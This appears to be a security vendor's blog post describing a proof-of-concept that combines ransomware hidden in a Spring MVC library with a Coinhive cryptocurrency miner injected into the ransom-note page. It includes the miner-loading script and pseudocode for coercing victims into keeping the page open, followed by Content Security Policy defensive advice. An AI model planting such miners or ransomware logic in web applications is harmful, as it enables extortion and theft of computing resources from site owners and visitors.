A few months back in a previous post we gave a POC for malware embedded in an enterprise Spring MVC app. Then we got to thinking, what if we pwn3d a web app with malicious code and turned the result into a self-paying crypto-currency miner? You could give the owner of the site the option to either pay the ransom or just let the mining operation complete, at which point their files get decrypted, and their life goes back to normal.

Recap: the Spring MVC POC

Our crypto miner web app extends the previous concept. So, let's first review:

Steps in the last POC:

  • Checks if the library is running as part of a Spring MVC app
  • Use reflection to get access to the database credentials
  • When triggered log into the database copy all the data out, encrypt it, and delete the database
  • Replaces all the web pages with a ransom note demanding the victim pay the ransom to decrypt and get their data back

Extending the POC with a crypto-miner

This concept takes the previous iteration and adds a miner to the operation so we can make some crypto-cash while we wait for the ransom to be delivered.

To do this, we'll leverage Coinhive which provides a simple JavaScript-based API for mining Moneros. If you're not familiar, that's a cryptocurrency that can be profitably mined using CPUs. We just include the miner provided by Coinhive in the ransom note page that replaces all the pages of the web application.

Insert Javascript and start the miner

This way the miner starts as soon as the ransomware note page is loaded.

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
 var miner = new CoinHive.Anonymous('YOUR_SITE_KEY');     
 miner.start();
</script>

Option A) Don't Touch That Close Button!

Next, we force the victim to continue the mining and not close the window. To do this, we use the JavaScript API provided by CoinHive to see if the number of hashes per second is greater than zero and add a line in the ransom note to say that all data will be lost if the hashes per second go to 0.

while(miner.getHashesPerSecond() > 0)
// show ransom note to allow decryption
// else destroy data

Option B) Pay The Ransom

We can also make things more interesting by letting the user either pay the ransom and unlock the data immediately or allow the crypto miner run until the amount required by the ransomware is mined, then decrypt the data.

while (miner.getAcceptedHashes() < SOME_VAL)
// keep mining
// else decrypt data since we already made our money

Wrapping Up

It seems like a new ransomware called Storagecrypt may already doing a variation of this attack. Of course, site owners with good security, especially those with good Content Security Policies can avoid this kind of attack by:

  • Only allowing scripts to be loaded from your site
  • Optionally, only allowing scripts to be loaded from specific URL's (like google fonts)
  • NEVER allowing inline javascript to be executed, ever.

Dr. Asankhaya Sharma is the Director of Software Engineering at CA Veracode. Asankhaya is a cyber security expert and technology leader with over a decade of experience in creating security products for industry, academia and open-source community. He is passionate about building high performing teams and taking innovative products to market. He is also an Adjunct Professor at the Singapore Institute of Technology.

Love to learn about Application Security?

Get all the latest news, tips and articles delivered right to your inbox.

 

 

 

contact menu